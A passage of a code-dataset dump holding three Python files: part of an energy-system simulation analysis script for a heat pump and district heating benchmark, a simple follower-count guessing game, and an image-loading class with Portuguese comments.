'StratifiedWaterStorageTank_0.mdot_ch_out',\n 'StratifiedWaterStorageTank_0.mdot_dis_out',\n ]\n ],\n 'heatpump': [\n 'power in kW',\n [\n 'heatpump_0.P_effective',\n 'heatpump_0.P_requested',\n ]\n ],\n 'flex heat controller state': [\n 'state',\n [\n 'FHctrl_0.state',\n ]\n ],\n 'flex heat controller HP mdot out': [\n 'HP mdot out',\n [\n 'FHctrl_0.mdot_HP_out',\n ]\n ],\n 'voltage controller': [\n 'setpoint in kW',\n [\n 'VoltageController_0.hp_p_el_kw_setpoint',\n ]\n ],\n 'electrical consumption': [\n 'electrical consumption in MW',\n [\n 'Load_1_0.p_mw',\n 'Load_2_0.p_mw',\n 'Heat Pump_0.p_mw',\n ]\n ],\n 'PV generation': [\n 'PV generation in MW',\n [\n 'PV_1_0.p_mw',\n 'PV_2_0.p_mw',\n ]\n ],\n 'voltage levels': [\n 'voltage levels in p.u.',\n [\n 'Bus_1_0.vm_pu',\n 'Bus_2_0.vm_pu',\n ]\n ],\n 'line loadings': [\n 'line loading in %',\n [\n 'LV_Line_0-1_0.loading_percent',\n 'LV_Line_1-2_0.loading_percent',\n ]\n ],\n 'line losses': [\n 'line losses in mw',\n [\n 'LV_Line_0-1_0.pl_mw',\n 'LV_Line_1-2_0.pl_mw',\n ]\n ],\n 'line losses': [\n 'line losses in mvar',\n [\n 'LV_Line_1-2_0.ql_mvar',\n 'LV_Line_0-1_0.ql_mvar',\n ]\n ],\n 'DHNetwork': [\n 'mass flow (mdot)',\n [\n 'DHNetwork_0.mdot_cons1_set',\n 'DHNetwork_0.mdot_cons2_set',\n 'DHNetwork_0.mdot_grid_set',\n 'DHNetwork_0.mdot_tank_in_set',\n 'DHNetwork_0.mdot_cons1',\n 'DHNetwork_0.mdot_cons2',\n 'DHNetwork_0.mdot_grid',\n 'DHNetwork_0.mdot_tank_in',\n ]\n ],\n}\n\nFIG_TYPE = 'png' # 'pdf'\nFIG_SIZE = [15, 8]\n\n\ndef data_processing(recipe, variations, folder_temp_files, summary_filename, drop_first_day_data=True):\n # # Data processing\n sim_results = {}\n results_store = pd.HDFStore(benchmark_sim.get_store_filename(recipe))\n # ToDo: Does the ME benchmark have a specific start time?\n start_time = '2019-02-01 00:00:00'\n\n for collector in results_store:\n for (simulator, attribute), data in results_store[collector].items():\n # Retrieve short name of data.\n sim_node_name = get_sim_node_name(simulator)\n res_name = '.'.join([sim_node_name, attribute])\n\n # Convert index to time format.\n data.index = pd.to_datetime(data.index, unit='s', origin=start_time)\n\n if drop_first_day_data:\n first_day_data = data.first('1D')\n sim_results[res_name] = data.drop(first_day_data.index)\n else:\n sim_results[res_name] = data\n results_store.close()\n\n # Power Grid\n if recipe['stochastic']:\n grid_voltage_bus_1_vm_pu = sim_results['ng__0.output']\n else:\n grid_voltage_bus_1_vm_pu = sim_results['Bus_1_0.vm_pu']\n grid_voltage_bus_1_max_pu = grid_voltage_bus_1_vm_pu.max()\n grid_voltage_bus_1_min_pu = grid_voltage_bus_1_vm_pu.min()\n\n grid_voltage_bus_2_vm_pu = sim_results['Bus_2_0.vm_pu']\n grid_voltage_bus_2_max = grid_voltage_bus_2_vm_pu.max()\n grid_voltage_bus_2_min = grid_voltage_bus_2_vm_pu.min()\n\n line_0_loading = sim_results['LV_Line_0-1_0.loading_percent']\n line_0_loading_max = line_0_loading.max()\n line_1_loading = sim_results['LV_Line_1-2_0.loading_percent']\n line_1_loading_max = line_1_loading.max()\n\n line_0_losses_pl_mw = sim_results['LV_Line_0-1_0.pl_mw']\n line_1_losses_pl_mw = sim_results['LV_Line_1-2_0.pl_mw']\n line_losses_pl_mw = line_0_losses_pl_mw + line_1_losses_pl_mw\n # line_reactive_consumption_mvar = sim_results['LV_Line_0-1_0.ql_mvar'].sum() + \\\n # sim_results['LV_Line_1-2_0.ql_mvar'].sum()\n\n\n # use Heat Pump consumption for evaluation!\n hp_p_effective = sim_results['heatpump_0.P_effective']\n # ToDo: rename variable!\n hp_w_effective = sim_results['heatpump_0.Qdot_cond']\n hp_average_COP = hp_w_effective.sum() / hp_p_effective.sum()\n\n # hp_T_cond_out = sim_results['heatpump_0.T_cond_out']\n # hp_T_evap_out = sim_results['heatpump_0.T_evap_out']\n\n pv_generation_p_mw = sim_results['PV_1_0.p_mw'] + sim_results['PV_2_0.p_mw']\n el_consumption_p_mw = sim_results['Heat Pump_0.p_mw'] + sim_results['Load_1_0.p_mw'] + sim_results['Load_2_0.p_mw']\n electricity_balance_mw = pv_generation_p_mw - el_consumption_p_mw - line_losses_pl_mw\n electricity_export_time_series_mw = electricity_balance_mw.where(electricity_balance_mw > 0, 0)\n electricity_export_mwh = electricity_export_time_series_mw.sum() / 60 # - line_losses\n electricity_import_time_series_mw = -electricity_balance_mw.where(electricity_balance_mw < 0, 0)\n electricity_import_mwh = electricity_import_time_series_mw.sum() / 60\n self_consumption_mwh = (pv_generation_p_mw - electricity_export_time_series_mw).sum() / 60\n self_consumption_perc = (self_consumption_mwh / (pv_generation_p_mw.sum() / 60)) * 100\n #ToDo: look at summer school example again\n # self_consumption_index = ((pv_generation_p_mw + el_consumption_p_mw) / pv_generation_p_mw).sum()\n\n # evaluate the percentage of thermal energy provided by the tank\n # https://adgefficiency.com/energy-basics-q-m-cp-dt/\n cp_water = 4.18 # mass heat capacity\n mdot_grid_kg_s = sim_results['FHctrl_0.mdot_grid_set'] # Mass flow injected by the grid\n temp_ext_grid_supply = sim_results['DHNetwork_0.T_supply_grid'] # Supply temperature from the external grid\n temp_ext_grid_return = sim_results['DHNetwork_0.T_return_grid'] # Return temperature to the external grid\n energy_ext_grid_kw_min = mdot_grid_kg_s / 60 * cp_water * (temp_ext_grid_supply - temp_ext_grid_return)\n\n # temp_hwt = sim_results['StratifiedWaterStorageTank_0.T_hot']\n hp_mdot_cond_out_kg_s = sim_results['heatpump_0.mdot_cond_out']\n hp_T_cond_out = sim_results['heatpump_0.T_cond_out']\n hwt_temp_cold = sim_results['StratifiedWaterStorageTank_0.T_cold']\n energy_tank_charged_kw_min = hp_mdot_cond_out_kg_s / 60 * cp_water * (hp_T_cond_out - hwt_temp_cold)\n\n hwt_temp_hot = sim_results['StratifiedWaterStorageTank_0.T_hot']\n hwt_temp_return = sim_results['DHNetwork_0.T_return_tank'] # Temperature of water returning from dh network to hwt\n mdot_tank_in_kg_s = sim_results['StratifiedWaterStorageTank_0.mdot_dis_in'] # Mass flow from the tank to dh network\n energy_tank_supplied_kw_min = mdot_tank_in_kg_s / 60 * cp_water * (hwt_temp_hot - hwt_temp_return)\n\n sum_energy_kw_min = energy_ext_grid_kw_min + energy_tank_charged_kw_min\n #heat_internal_percentage = 100 * energy_tank.sum() / (energy_ext_grid.sum() + energy_tank.sum())\n\n # evaluate the critical node temperature\n t_supply_1 = sim_results['DHNetwork_0.T_supply_cons1']\n t_supply_2 = sim_results['DHNetwork_0.T_supply_cons2']\n\n # Look at setpoint of the voltage controller for the heat pump to evaluate the curtailment\n hp_p_rated = sim_results['heatpump_0.P_rated'].max()\n hp_p_el_kw_setpoint = sim_results['VoltageController_0.hp_p_el_kw_setpoint']\n hp_p_el_kw_setpoint_percentage = hp_p_el_kw_setpoint / hp_p_rated * 100\n hp_p_el_kw_setpoint_percentage_mean = hp_p_el_kw_setpoint_percentage.mean()\n\n sim_data = {'ID': [recipe['ID']],\n #'grid_voltage_bus_1_max_pu': [grid_voltage_bus_1_max_pu],\n 'grid_voltage_bus_2_max_pu': [grid_voltage_bus_2_max],\n 'line_0_loading_max_perc': [line_0_loading_max],\n #'line_1_loading_max_perc': [line_1_loading_max],\n 'hp_electr_energy_gwh': [hp_p_effective.sum() / 60 / 1000],\n 'hp_heat_energy_gwh': [hp_w_effective.sum() / 60 / 1000],\n 'hp_average_COP': [hp_average_COP],\n 'electricity_import_mwh': [electricity_import_mwh],\n 'electricity_export_mwh': [electricity_export_mwh],\n #'self_consumption_mwh': [self_consumption_mwh],\n 'self_consumption_perc': [self_consumption_perc],\n #'line_losses_mwh': [line_losses_pl_mw.sum() / 60],\n #'hp_p_el_kw_setpoint_perc_mean': [hp_p_el_kw_setpoint_percentage_mean],\n 't_supply_min': [min([t_supply_1.min(), t_supply_2.min()])],\n 't_supply_max': [max([t_supply_1.max(), t_supply_2.max()])],\n #'energy_sum_gwh': [sum_energy_kw_min.sum() / 60 / 1000],\n 'heat_import_gwh': [energy_ext_grid_kw_min.sum() / 60 / 1000],\n 'heat_import_perc': [energy_ext_grid_kw_min.sum() / sum_energy_kw_min.sum() / 60 / 1000],\n 'hp_perc': [hp_w_effective.sum() / sum_energy_kw_min.sum() / 60 / 1000],\n #'grid_voltage_bus_1_min_pu': [grid_voltage_bus_1_min_pu],\n #'grid_voltage_bus_2_min_pu': [grid_voltage_bus_2_min],\n #'electricity_balance_mwh': [electricity_balance_mw.sum() / 60],\n #'line_reactive_consumption_mvar': [line_reactive_consumption_mvar],\n #'energy_tank_charged_kw_min_gwh': [energy_tank_charged_kw_min.sum() / 60 / 1000],\n #'energy_tank_supplied_kw_min_gwh': [energy_tank_supplied_kw_min.sum() / 60 / 1000],\n #'heat_internal_percentage': [heat_internal_percentage],\n #'self_consumption_index': [self_consumption_index],\n 'File ID/dataframe': [\n '{}'.format(benchmark_sim.get_store_filename(recipe)) + '/' + 'timeseries/sim_{}'.format(recipe['ID'])]}\n\n # Write variation parameter to sim_data dict (needed for meta model analysis)\n for key in recipe.keys():\n if key in list(variations.values())[0].keys():\n if isinstance(recipe[key], dict):\n for key2, value in recipe[key].items():\n sim_data[f\"{key}.{key2}\"] = value\n # print(f\"sim_data: {sim_data}\")\n sim_data_df = pd.DataFrame(sim_data)\n sim_data_df.to_csv(f\"{folder_temp_files}/{summary_filename}.csv\")\n run_store = pd.HDFStore(f\"{folder_temp_files}/{summary_filename}.h5\")\n run_store['run_{}'.format(recipe['ID'])] = sim_data_df\n run_store.close()\n\n\ndef get_sim_node_name(\n full_name\n):\n (sim_name, sim_node) = full_name.split('.')\n return sim_node\n\n\ndef retrieve_results(\n store_name,\n start_time,\n drop_first_day_data = True\n):\n results_dict = {}\n results_store = pd.HDFStore(store_name)\n\n for collector in results_store:\n for (simulator, attribute), data in results_store[collector].items():\n # Retrieve short name of data.\n sim_node_name = get_sim_node_name(simulator)\n res_name = '.'.join([sim_node_name, attribute])\n\n # Convert index to time format.\n data.index = pd.to_datetime(data.index, unit='s', origin=start_time)\n\n if drop_first_day_data:\n first_day_data = data.first('1D')\n results_dict[res_name] = data.drop(first_day_data.index)\n else:\n results_dict[res_name] = data\n\n results_store.close()\n return results_dict\n\n\ndef plot_results_compare(\n entity, attr, label, folder_figures,\n recipes,\n dict_results_list,\n fig_id, show=False, fig_type='png'\n):\n fig, axes_attr_compare = plt.subplots(figsize=FIG_SIZE)\n for i in range(len(dict_results_list)):\n attr_i = dict_results_list[i][f\"{entity}.{attr}\"]\n axes_attr_compare.plot(attr_i, label='{} {}'.format(entity, list(recipes.values())[i]['ID']))\n axes_attr_compare.legend(loc='upper right')\n axes_attr_compare.set_xlabel('date')\n axes_attr_compare.set_ylabel(label)\n\n plt.savefig('{}/fig_{}_{}_{}.{}'.format(folder_figures, fig_id, entity, attr, fig_type))\n if show:\n plt.show()\n plt.close()\n\n # fig, axes_sorted_attr_compare = plt.subplots(figsize=FIG_SIZE)\n # #df_sorted_attr_compare = pd.DataFrame()\n # for i in range(len(dict_results_list)):\n # attr_i = dict_results_list[i][f\"{entity}.{attr}\"]\n # sorted_attr_i = attr_i.sort_values(ascending=False, ignore_index=True)\n # axes_sorted_attr_compare.plot(sorted_attr_i, label='{} {}'.format(entity, list(recipes.values())[i]['ID']))\n # #df_sorted_attr_compare['{} {}'.format(entity, list(recipes.values())[i]['ID'])] = sorted_attr_i\n # axes_sorted_attr_compare.legend(loc='upper right')\n # axes_sorted_attr_compare.set_ylabel(label)\n # axes_sorted_attr_compare.set_title('duration plot of {}'.format(attr))\n # plt.savefig('{}/fig_sorted_{}_{}.{}'.format(FOLDER, fig_id, attr, fig_type))\n # if show:\n # plt.show()\n # plt.close()\n\n #axes_sorted_attr_compare_hist = df_sorted_attr_compare.plot.hist(bins=bins, alpha=0.5, figsize=FIG_SIZE)\n #axes_sorted_attr_compare_hist.legend(loc='upper right')\n #axes_sorted_attr_compare_hist.set_xlabel(label)\n #plt.savefig('{}/fig_hist_{}.{}'.format(FOLDER, fig_id, fig_type))\n #if show:\n # plt.show()\n #plt.close()\n\n #return (attr_type1.sum(), attr_type2.sum())\n\n\ndef plot_simulation_results(sim_parameters):\n basic_conf = sim_parameters['basic_conf']\n\n dict_results_list = []\n for filename in os.scandir(basic_conf['folder_temp_files']):\n if filename.is_file():\n if sim_parameters['summary_filename'] not in str(filename):\n if 'recipes.json' not in str(filename):\n logger.info(filename)\n dict_results_list.append(retrieve_results(filename,\n START_TIME,\n sim_parameters['drop_first_day_data']))\n\n #Read in recipes from json file\n with open(f\"{basic_conf['folder_temp_files']}/recipes.json\", \"r\") as json_file:\n recipes = json.load(json_file)\n\n for label in PLOT_DICT:\n x_label = PLOT_DICT[label][0]\n for attr in PLOT_DICT[label][1]:\n entity = attr.split('.')[0]\n attr_name = attr.split('.')[1]\n plot_results_compare(\n entity, attr_name, x_label, sim_parameters['folder_figures'],\n recipes,\n dict_results_list,\n label, sim_parameters['show_plots'], FIG_TYPE\n )\n\n\nif __name__ == '__main__':\n # sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters.json')\n # sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters.json')\n sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters_inter_domain.json')\n # plot_simulation_results(sim_parameters)\n\n with open(f\"{sim_parameters['basic_conf']['folder_temp_files']}/recipes.json\", \"r\") as read_file:\n recipes = json.loads(read_file)\n with open(f\"{sim_parameters['basic_conf']['folder_temp_files']}/variations.json\", \"r\") as read_file:\n variations = json.loads(read_file)\n\n for recipe_name in recipes:\n logger.info(f'Data processing scenario with recipe {recipe_name}: {recipes[recipe_name]}')\n data_processing(recipes[recipe_name],\n variations,\n sim_parameters['basic_conf']['folder_temp_files'],\n sim_parameters['summary_filename'],\n sim_parameters['drop_first_day_data'])","repo_name":"ERIGrid2/toolbox_doe_sa","sub_path":"benchmark_2_example/benchmark_multi_energy_analysis.py","file_name":"benchmark_multi_energy_analysis.py","file_ext":"py","file_size_in_byte":16667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14113242983","text":"# Higher Lower game is a comparison between 2 different instagram accounts about which one has higher followers\n# There are 2 choices provided: A and B (both randomly chosen from a list) and the player has to guess which account has more followers A or B\n# If the player chooses correctly then B becomes A for the next round and B is choosen randomly from the list again and the score increases by 1\n# If the player chooses incorrectly then game ends and the final score is displayed\n\n# List of accounts is defined as followed\n# each item is a dictianry with the following keys:\n# name\n# follower_count\n# description\n# country\n\nimport os\nimport random\nfrom game_data import data\nfrom art import logo, vs\n\ndef print_gameplay(A, B):\n \"\"\"Formats and prints gameplay message between A and B\"\"\"\n print(f\"Compare A: {A['name']}, a {A['description']}, from {A['country']}.\")\n print(vs)\n print(f\"Against B: {B['name']}, a {B['description']}, from {B['country']}.\")\n\n\ndef compare_followers(A, B):\n \"\"\"Asks user for input and compares whether A or B has more followers and returns True if user chooses correctly\"\"\"\n user_input = input(\"Who has more followers? Type 'A' or 'B': \")\n if user_input == 'A' and A[\"follower_count\"] >= B[\"follower_count\"]:\n return True\n elif user_input == 'B' and B[\"follower_count\"] >= A[\"follower_count\"]:\n return True\n else:\n return False\n\n\ndef gameplay():\n \"\"\"Main function that controls other functions\"\"\"\n continue_game = True\n score = 0\n #randomly choose 2 items from list as A and B\n A = random.choice(data)\n B = random.choice(data)\n if A == B:\n B = random.choice(data)\n print(logo)\n print_gameplay(A, B)\n continue_game = compare_followers(A, B)\n\n while continue_game:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(logo)\n if continue_game:\n A = B\n B = random.choice(data)\n if A == B:\n B = random.choice(data)\n score += 1\n print(f\"You are right! Current Score: {score}\")\n else:\n break\n print_gameplay(A, B)\n continue_game = compare_followers(A, B)\n \n print(f\"Sorry that is wrong. Final Score: {score}\")\n\n\ngameplay()","repo_name":"souvik119/Python100DaysOfCode","sub_path":"Day11-20/Day14/higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5466020091","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 10 22:12:57 2017\n\n@author: willian\n\"\"\"\n\n\nimport sys\nimport ConfVars\nimport mahotas as mh\nfrom os import path\nimport numpy as np\nimport logging\nfrom matplotlib import pyplot as plt\n\n\n'''\nImagem\n'''\nclass Imagem():\n \n def __init__(self, arquivo, rgb=True):\n self.formato = self.getFormato(arquivo)\n self.arquivo = arquivo\n self.rgb = rgb\n \n if not path.isfile(arquivo):\n sys.exit(\"Erro ao carregar a imagem\")\n \n self.load(arquivo)\n self.tamanho = self.dados.shape\n self.rotulo = ConfVars.ROTULOS_CLASSES[self.getClasse()[0]]\n self.idxpatches = []\n \n # Carrega o arquivo da imagem \n def load(self, arquivo, rgb=True): \n if rgb:\n self.dados = mh.imread(arquivo)\n else:\n self.dados = mh.imread(arquivo, as_grey=True)\n self.dados = self.dados.astype(np.uint8)\n \n # Retorna uma imagem rgb em escala de cinza\n def getCinza(self):\n return(mh.colors.rgb2grey(self.dados))\n \n # Retorna o formato da imagem (extensao do arquivo) \n def getFormato(self, arquivo):\n return (path.basename(arquivo.upper()).split('.')[-1])\n \n # Retorna a classe a subclasse da imagem \n def getClasse(self):\n info_arquivo = str(self.arquivo[self.arquivo.rfind(\"/\")+1:]).split('_') \n \n if info_arquivo:\n classe = info_arquivo[1] \n subclasse = info_arquivo[2].split('-')[0]\n else:\n logging.info(\"Problema ao recuperar o rotulo/classe da imagem.\")\n \n return (classe,subclasse)\n \n # Exibe a imagem passada\n def show(self): \n try:\n plt.imshow(self.dados)\n plt.show()\n plt.clf()\n except Exception as e:\n logging.info(\"Erro ao exibir a imagem {0}\".format(str(e)))","repo_name":"awillsousa/PatchClassifiers","sub_path":"tensorpatch/patch_scripts/Imagem.py","file_name":"Imagem.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
    {}